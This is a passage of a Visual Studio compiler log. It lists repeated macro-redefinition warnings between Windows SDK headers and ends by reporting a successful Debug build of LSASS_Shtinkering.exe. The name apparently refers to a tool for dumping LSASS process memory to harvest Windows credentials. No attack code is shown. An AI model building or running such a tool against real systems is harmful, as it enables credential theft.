 17 | C:\Program Files (x86)\Windows Kits\10\Include\10.0.18362.0\um\winnt.h(2503): message : 参见“STATUS_SEGMENT_NOTIFICATION”的前一个定义
 18 | C:\Program Files (x86)\Windows Kits\10\Include\10.0.18362.0\shared\ntstatus.h(983,1): warning C4005: “STATUS_FATAL_APP_EXIT”: 宏重定义
 19 | C:\Program Files (x86)\Windows Kits\10\Include\10.0.18362.0\um\winnt.h(2504): message : 参见“STATUS_FATAL_APP_EXIT”的前一个定义
 20 | C:\Program Files (x86)\Windows Kits\10\Include\10.0.18362.0\shared\ntstatus.h(1303,1): warning C4005: “DBG_REPLY_LATER”: 宏重定义
 21 | C:\Program Files (x86)\Windows Kits\10\Include\10.0.18362.0\um\winnt.h(2505): message : 参见“DBG_REPLY_LATER”的前一个定义
 22 | C:\Program Files (x86)\Windows Kits\10\Include\10.0.18362.0\shared\ntstatus.h(1321,1): warning C4005: “DBG_TERMINATE_THREAD”: 宏重定义
 23 | C:\Program Files (x86)\Windows Kits\10\Include\10.0.18362.0\um\winnt.h(2506): message : 参见“DBG_TERMINATE_THREAD”的前一个定义
 24 | C:\Program Files (x86)\Windows Kits\10\Include\10.0.18362.0\shared\ntstatus.h(1330,1): warning C4005: “DBG_TERMINATE_PROCESS”: 宏重定义
 25 | C:\Program Files (x86)\Windows Kits\10\Include\10.0.18362.0\um\winnt.h(2507): message : 参见“DBG_TERMINATE_PROCESS”的前一个定义
 26 | C:\Program Files (x86)\Windows Kits\10\Include\10.0.18362.0\shared\ntstatus.h(1339,1): warning C4005: “DBG_CONTROL_C”: 宏重定义
 27 | C:\Program Files (x86)\Windows Kits\10\Include\10.0.18362.0\um\winnt.h(2508): message : 参见“DBG_CONTROL_C”的前一个定义
 28 | C:\Program Files (x86)\Windows Kits\10\Include\10.0.18362.0\shared\ntstatus.h(1348,1): warning C4005: “DBG_PRINTEXCEPTION_C”: 宏重定义
 29 | C:\Program Files (x86)\Windows Kits\10\Include\10.0.18362.0\um\winnt.h(2509): message : 参见“DBG_PRINTEXCEPTION_C”的前一个定义
 30 | C:\Program Files (x86)\Windows Kits\10\Include\10.0.18362.0\shared\ntstatus.h(1357,1): warning C4005: “DBG_RIPEXCEPTION”: 宏重定义
 31 | C:\Program Files (x86)\Windows Kits\10\Include\10.0.18362.0\um\winnt.h(2510): message : 参见“DBG_RIPEXCEPTION”的前一个定义
 32 | C:\Program Files (x86)\Windows Kits\10\Include\10.0.18362.0\shared\ntstatus.h(1366,1): warning C4005: “DBG_CONTROL_BREAK”: 宏重定义
 33 | C:\Program Files (x86)\Windows Kits\10\Include\10.0.18362.0\um\winnt.h(2511): message : 参见“DBG_CONTROL_BREAK”的前一个定义
 34 | C:\Program Files (x86)\Windows Kits\10\Include\10.0.18362.0\shared\ntstatus.h(1375,1): warning C4005: “DBG_COMMAND_EXCEPTION”: 宏重定义
 35 | C:\Program Files (x86)\Windows Kits\10\Include\10.0.18362.0\um\winnt.h(2512): message : 参见“DBG_COMMAND_EXCEPTION”的前一个定义
 36 | C:\Program Files (x86)\Windows Kits\10\Include\10.0.18362.0\shared\ntstatus.h(1384,1): warning C4005: “DBG_PRINTEXCEPTION_WIDE_C”: 宏重定义
 37 | C:\Program Files (x86)\Windows Kits\10\Include\10.0.18362.0\um\winnt.h(2513): message : 参见“DBG_PRINTEXCEPTION_WIDE_C”的前一个定义
 38 | C:\Program Files (x86)\Windows Kits\10\Include\10.0.18362.0\shared\ntstatus.h(1416,1): warning C4005: “STATUS_GUARD_PAGE_VIOLATION”: 宏重定义
 39 | C:\Program Files (x86)\Windows Kits\10\Include\10.0.18362.0\um\winnt.h(2514): message : 参见“STATUS_GUARD_PAGE_VIOLATION”的前一个定义
 40 | C:\Program Files (x86)\Windows Kits\10\Include\10.0.18362.0\shared\ntstatus.h(1427,1): warning C4005: “STATUS_DATATYPE_MISALIGNMENT”: 宏重定义
 41 | C:\Program Files (x86)\Windows Kits\10\Include\10.0.18362.0\um\winnt.h(2515): message : 参见“STATUS_DATATYPE_MISALIGNMENT”的前一个定义
 42 | C:\Program Files (x86)\Windows Kits\10\Include\10.0.18362.0\shared\ntstatus.h(1438,1): warning C4005: “STATUS_BREAKPOINT”: 宏重定义
 43 | C:\Program Files (x86)\Windows Kits\10\Include\10.0.18362.0\um\winnt.h(2516): message : 参见“STATUS_BREAKPOINT”的前一个定义
 44 | C:\Program Files (x86)\Windows Kits\10\Include\10.0.18362.0\shared\ntstatus.h(1449,1): warning C4005: “STATUS_SINGLE_STEP”: 宏重定义
 45 | C:\Program Files (x86)\Windows Kits\10\Include\10.0.18362.0\um\winnt.h(2517): message : 参见“STATUS_SINGLE_STEP”的前一个定义
 46 | C:\Program Files (x86)\Windows Kits\10\Include\10.0.18362.0\shared\ntstatus.h(1752,1): warning C4005: “STATUS_LONGJUMP”: 宏重定义
 47 | C:\Program Files (x86)\Windows Kits\10\Include\10.0.18362.0\um\winnt.h(2518): message : 参见“STATUS_LONGJUMP”的前一个定义
 48 | C:\Program Files (x86)\Windows Kits\10\Include\10.0.18362.0\shared\ntstatus.h(1779,1): warning C4005: “STATUS_UNWIND_CONSOLIDATE”: 宏重定义
 49 | C:\Program Files (x86)\Windows Kits\10\Include\10.0.18362.0\um\winnt.h(2519): message : 参见“STATUS_UNWIND_CONSOLIDATE”的前一个定义
 50 | C:\Program Files (x86)\Windows Kits\10\Include\10.0.18362.0\shared\ntstatus.h(1874,1): warning C4005: “DBG_EXCEPTION_NOT_HANDLED”: 宏重定义
 51 | C:\Program Files (x86)\Windows Kits\10\Include\10.0.18362.0\um\winnt.h(2520): message : 参见“DBG_EXCEPTION_NOT_HANDLED”的前一个定义
 52 | C:\Program Files (x86)\Windows Kits\10\Include\10.0.18362.0\shared\ntstatus.h(2020,1): warning C4005: “STATUS_ACCESS_VIOLATION”: 宏重定义
 53 | C:\Program Files (x86)\Windows Kits\10\Include\10.0.18362.0\um\winnt.h(2521): message : 参见“STATUS_ACCESS_VIOLATION”的前一个定义
 54 | C:\Program Files (x86)\Windows Kits\10\Include\10.0.18362.0\shared\ntstatus.h(2029,1): warning C4005: “STATUS_IN_PAGE_ERROR”: 宏重定义
 55 | C:\Program Files (x86)\Windows Kits\10\Include\10.0.18362.0\um\winnt.h(2522): message : 参见“STATUS_IN_PAGE_ERROR”的前一个定义
 56 | C:\Program Files (x86)\Windows Kits\10\Include\10.0.18362.0\shared\ntstatus.h(2047,1): warning C4005: “STATUS_INVALID_HANDLE”: 宏重定义
 57 | C:\Program Files (x86)\Windows Kits\10\Include\10.0.18362.0\um\winnt.h(2523): message : 参见“STATUS_INVALID_HANDLE”的前一个定义
 58 | C:\Program Files (x86)\Windows Kits\10\Include\10.0.18362.0\shared\ntstatus.h(2092,1): warning C4005: “STATUS_INVALID_PARAMETER”: 宏重定义
 59 | C:\Program Files (x86)\Windows Kits\10\Include\10.0.18362.0\um\winnt.h(2524): message : 参见“STATUS_INVALID_PARAMETER”的前一个定义
 60 | C:\Program Files (x86)\Windows Kits\10\Include\10.0.18362.0\shared\ntstatus.h(2192,1): warning C4005: “STATUS_NO_MEMORY”: 宏重定义
 61 | C:\Program Files (x86)\Windows Kits\10\Include\10.0.18362.0\um\winnt.h(2525): message : 参见“STATUS_NO_MEMORY”的前一个定义
 62 | C:\Program Files (x86)\Windows Kits\10\Include\10.0.18362.0\shared\ntstatus.h(2249,1): warning C4005: “STATUS_ILLEGAL_INSTRUCTION”: 宏重定义
 63 | C:\Program Files (x86)\Windows Kits\10\Include\10.0.18362.0\um\winnt.h(2526): message : 参见“STATUS_ILLEGAL_INSTRUCTION”的前一个定义
 64 | C:\Program Files (x86)\Windows Kits\10\Include\10.0.18362.0\shared\ntstatus.h(2330,1): warning C4005: “STATUS_NONCONTINUABLE_EXCEPTION”: 宏重定义
 65 | C:\Program Files (x86)\Windows Kits\10\Include\10.0.18362.0\um\winnt.h(2527): message : 参见“STATUS_NONCONTINUABLE_EXCEPTION”的前一个定义
 66 | C:\Program Files (x86)\Windows Kits\10\Include\10.0.18362.0\shared\ntstatus.h(2339,1): warning C4005: “STATUS_INVALID_DISPOSITION”: 宏重定义
 67 | C:\Program Files (x86)\Windows Kits\10\Include\10.0.18362.0\um\winnt.h(2528): message : 参见“STATUS_INVALID_DISPOSITION”的前一个定义
 68 | C:\Program Files (x86)\Windows Kits\10\Include\10.0.18362.0\shared\ntstatus.h(3272,1): warning C4005: “STATUS_ARRAY_BOUNDS_EXCEEDED”: 宏重定义
 69 | C:\Program Files (x86)\Windows Kits\10\Include\10.0.18362.0\um\winnt.h(2529): message : 参见“STATUS_ARRAY_BOUNDS_EXCEEDED”的前一个定义
 70 | C:\Program Files (x86)\Windows Kits\10\Include\10.0.18362.0\shared\ntstatus.h(3282,1): warning C4005: “STATUS_FLOAT_DENORMAL_OPERAND”: 宏重定义
 71 | C:\Program Files (x86)\Windows Kits\10\Include\10.0.18362.0\um\winnt.h(2530): message : 参见“STATUS_FLOAT_DENORMAL_OPERAND”的前一个定义
 72 | C:\Program Files (x86)\Windows Kits\10\Include\10.0.18362.0\shared\ntstatus.h(3292,1): warning C4005: “STATUS_FLOAT_DIVIDE_BY_ZERO”: 宏重定义
 73 | C:\Program Files (x86)\Windows Kits\10\Include\10.0.18362.0\um\winnt.h(2531): message : 参见“STATUS_FLOAT_DIVIDE_BY_ZERO”的前一个定义
 74 | C:\Program Files (x86)\Windows Kits\10\Include\10.0.18362.0\shared\ntstatus.h(3302,1): warning C4005: “STATUS_FLOAT_INEXACT_RESULT”: 宏重定义
 75 | C:\Program Files (x86)\Windows Kits\10\Include\10.0.18362.0\um\winnt.h(2532): message : 参见“STATUS_FLOAT_INEXACT_RESULT”的前一个定义
 76 | C:\Program Files (x86)\Windows Kits\10\Include\10.0.18362.0\shared\ntstatus.h(3312,1): warning C4005: “STATUS_FLOAT_INVALID_OPERATION”: 宏重定义
 77 | C:\Program Files (x86)\Windows Kits\10\Include\10.0.18362.0\um\winnt.h(2533): message : 参见“STATUS_FLOAT_INVALID_OPERATION”的前一个定义
 78 | C:\Program Files (x86)\Windows Kits\10\Include\10.0.18362.0\shared\ntstatus.h(3322,1): warning C4005: “STATUS_FLOAT_OVERFLOW”: 宏重定义
 79 | C:\Program Files (x86)\Windows Kits\10\Include\10.0.18362.0\um\winnt.h(2534): message : 参见“STATUS_FLOAT_OVERFLOW”的前一个定义
 80 | C:\Program Files (x86)\Windows Kits\10\Include\10.0.18362.0\shared\ntstatus.h(3332,1): warning C4005: “STATUS_FLOAT_STACK_CHECK”: 宏重定义
 81 | C:\Program Files (x86)\Windows Kits\10\Include\10.0.18362.0\um\winnt.h(2535): message : 参见“STATUS_FLOAT_STACK_CHECK”的前一个定义
 82 | C:\Program Files (x86)\Windows Kits\10\Include\10.0.18362.0\shared\ntstatus.h(3342,1): warning C4005: “STATUS_FLOAT_UNDERFLOW”: 宏重定义
 83 | C:\Program Files (x86)\Windows Kits\10\Include\10.0.18362.0\um\winnt.h(2536): message : 参见“STATUS_FLOAT_UNDERFLOW”的前一个定义
 84 | C:\Program Files (x86)\Windows Kits\10\Include\10.0.18362.0\shared\ntstatus.h(3352,1): warning C4005: “STATUS_INTEGER_DIVIDE_BY_ZERO”: 宏重定义
 85 | C:\Program Files (x86)\Windows Kits\10\Include\10.0.18362.0\um\winnt.h(2537): message : 参见“STATUS_INTEGER_DIVIDE_BY_ZERO”的前一个定义
 86 | C:\Program Files (x86)\Windows Kits\10\Include\10.0.18362.0\shared\ntstatus.h(3362,1): warning C4005: “STATUS_INTEGER_OVERFLOW”: 宏重定义
 87 | C:\Program Files (x86)\Windows Kits\10\Include\10.0.18362.0\um\winnt.h(2538): message : 参见“STATUS_INTEGER_OVERFLOW”的前一个定义
 88 | C:\Program Files (x86)\Windows Kits\10\Include\10.0.18362.0\shared\ntstatus.h(3372,1): warning C4005: “STATUS_PRIVILEGED_INSTRUCTION”: 宏重定义
 89 | C:\Program Files (x86)\Windows Kits\10\Include\10.0.18362.0\um\winnt.h(2539): message : 参见“STATUS_PRIVILEGED_INSTRUCTION”的前一个定义
 90 | C:\Program Files (x86)\Windows Kits\10\Include\10.0.18362.0\shared\ntstatus.h(4318,1): warning C4005: “STATUS_STACK_OVERFLOW”: 宏重定义
 91 | C:\Program Files (x86)\Windows Kits\10\Include\10.0.18362.0\um\winnt.h(2540): message : 参见“STATUS_STACK_OVERFLOW”的前一个定义
 92 | C:\Program Files (x86)\Windows Kits\10\Include\10.0.18362.0\shared\ntstatus.h(4835,1): warning C4005: “STATUS_DLL_NOT_FOUND”: 宏重定义
 93 | C:\Program Files (x86)\Windows Kits\10\Include\10.0.18362.0\um\winnt.h(2541): message : 参见“STATUS_DLL_NOT_FOUND”的前一个定义
 94 | C:\Program Files (x86)\Windows Kits\10\Include\10.0.18362.0\shared\ntstatus.h(4864,1): warning C4005: “STATUS_ORDINAL_NOT_FOUND”: 宏重定义
 95 | C:\Program Files (x86)\Windows Kits\10\Include\10.0.18362.0\um\winnt.h(2542): message : 参见“STATUS_ORDINAL_NOT_FOUND”的前一个定义
 96 | C:\Program Files (x86)\Windows Kits\10\Include\10.0.18362.0\shared\ntstatus.h(4874,1): warning C4005: “STATUS_ENTRYPOINT_NOT_FOUND”: 宏重定义
 97 | C:\Program Files (x86)\Windows Kits\10\Include\10.0.18362.0\um\winnt.h(2543): message : 参见“STATUS_ENTRYPOINT_NOT_FOUND”的前一个定义
 98 | C:\Program Files (x86)\Windows Kits\10\Include\10.0.18362.0\shared\ntstatus.h(4884,1): warning C4005: “STATUS_CONTROL_C_EXIT”: 宏重定义
 99 | C:\Program Files (x86)\Windows Kits\10\Include\10.0.18362.0\um\winnt.h(2544): message : 参见“STATUS_CONTROL_C_EXIT”的前一个定义
100 | C:\Program Files (x86)\Windows Kits\10\Include\10.0.18362.0\shared\ntstatus.h(4962,1): warning C4005: “STATUS_DLL_INIT_FAILED”: 宏重定义
101 | C:\Program Files (x86)\Windows Kits\10\Include\10.0.18362.0\um\winnt.h(2545): message : 参见“STATUS_DLL_INIT_FAILED”的前一个定义
102 | C:\Program Files (x86)\Windows Kits\10\Include\10.0.18362.0\shared\ntstatus.h(7508,1): warning C4005: “STATUS_FLOAT_MULTIPLE_FAULTS”: 宏重定义
103 | C:\Program Files (x86)\Windows Kits\10\Include\10.0.18362.0\um\winnt.h(2546): message : 参见“STATUS_FLOAT_MULTIPLE_FAULTS”的前一个定义
104 | C:\Program Files (x86)\Windows Kits\10\Include\10.0.18362.0\shared\ntstatus.h(7518,1): warning C4005: “STATUS_FLOAT_MULTIPLE_TRAPS”: 宏重定义
105 | C:\Program Files (x86)\Windows Kits\10\Include\10.0.18362.0\um\winnt.h(2547): message : 参见“STATUS_FLOAT_MULTIPLE_TRAPS”的前一个定义
106 | C:\Program Files (x86)\Windows Kits\10\Include\10.0.18362.0\shared\ntstatus.h(7650,1): warning C4005: “STATUS_REG_NAT_CONSUMPTION”: 宏重定义
107 | C:\Program Files (x86)\Windows Kits\10\Include\10.0.18362.0\um\winnt.h(2548): message : 参见“STATUS_REG_NAT_CONSUMPTION”的前一个定义
108 | C:\Program Files (x86)\Windows Kits\10\Include\10.0.18362.0\shared\ntstatus.h(8633,1): warning C4005: “STATUS_HEAP_CORRUPTION”: 宏重定义
109 | C:\Program Files (x86)\Windows Kits\10\Include\10.0.18362.0\um\winnt.h(2549): message : 参见“STATUS_HEAP_CORRUPTION”的前一个定义
110 | C:\Program Files (x86)\Windows Kits\10\Include\10.0.18362.0\shared\ntstatus.h(8861,1): warning C4005: “STATUS_STACK_BUFFER_OVERRUN”: 宏重定义
111 | C:\Program Files (x86)\Windows Kits\10\Include\10.0.18362.0\um\winnt.h(2550): message : 参见“STATUS_STACK_BUFFER_OVERRUN”的前一个定义
112 | C:\Program Files (x86)\Windows Kits\10\Include\10.0.18362.0\shared\ntstatus.h(8988,1): warning C4005: “STATUS_INVALID_CRUNTIME_PARAMETER”: 宏重定义
113 | C:\Program Files (x86)\Windows Kits\10\Include\10.0.18362.0\um\winnt.h(2551): message : 参见“STATUS_INVALID_CRUNTIME_PARAMETER”的前一个定义
114 | C:\Program Files (x86)\Windows Kits\10\Include\10.0.18362.0\shared\ntstatus.h(9051,1): warning C4005: “STATUS_ASSERTION_FAILURE”: 宏重定义
115 | C:\Program Files (x86)\Windows Kits\10\Include\10.0.18362.0\um\winnt.h(2552): message : 参见“STATUS_ASSERTION_FAILURE”的前一个定义
116 | C:\Program Files (x86)\Windows Kits\10\Include\10.0.18362.0\shared\ntstatus.h(9969,1): warning C4005: “STATUS_ENCLAVE_VIOLATION”: 宏重定义
117 | C:\Program Files (x86)\Windows Kits\10\Include\10.0.18362.0\um\winnt.h(2553): message : 参见“STATUS_ENCLAVE_VIOLATION”的前一个定义
118 | C:\Program Files (x86)\Windows Kits\10\Include\10.0.18362.0\shared\ntstatus.h(10369,1): warning C4005: “STATUS_INTERRUPTED”: 宏重定义
119 | C:\Program Files (x86)\Windows Kits\10\Include\10.0.18362.0\um\winnt.h(2554): message : 参见“STATUS_INTERRUPTED”的前一个定义
120 | C:\Program Files (x86)\Windows Kits\10\Include\10.0.18362.0\shared\ntstatus.h(10378,1): warning C4005: “STATUS_THREAD_NOT_RUNNING”: 宏重定义
121 | C:\Program Files (x86)\Windows Kits\10\Include\10.0.18362.0\um\winnt.h(2555): message : 参见“STATUS_THREAD_NOT_RUNNING”的前一个定义
122 | C:\Program Files (x86)\Windows Kits\10\Include\10.0.18362.0\shared\ntstatus.h(10672,1): warning C4005: “STATUS_ALREADY_REGISTERED”: 宏重定义
123 | C:\Program Files (x86)\Windows Kits\10\Include\10.0.18362.0\um\winnt.h(2556): message : 参见“STATUS_ALREADY_REGISTERED”的前一个定义
124 | C:\Program Files (x86)\Windows Kits\10\Include\10.0.18362.0\shared\ntstatus.h(14205,1): warning C4005: “STATUS_SXS_EARLY_DEACTIVATION”: 宏重定义
125 | C:\Program Files (x86)\Windows Kits\10\Include\10.0.18362.0\um\winnt.h(2558): message : 参见“STATUS_SXS_EARLY_DEACTIVATION”的前一个定义
126 | C:\Program Files (x86)\Windows Kits\10\Include\10.0.18362.0\shared\ntstatus.h(14214,1): warning C4005: “STATUS_SXS_INVALID_DEACTIVATION”: 宏重定义
127 | C:\Program Files (x86)\Windows Kits\10\Include\10.0.18362.0\um\winnt.h(2559): message : 参见“STATUS_SXS_INVALID_DEACTIVATION”的前一个定义
128 |   LSASS_Shtinkering.vcxproj -> C:\Users\windows7\Desktop\Lsass-Shtinkering-main\Lsass-Shtinkering-main\x64\Debug\LSASS_Shtinkering.exe
129 | 


--------------------------------------------------------------------------------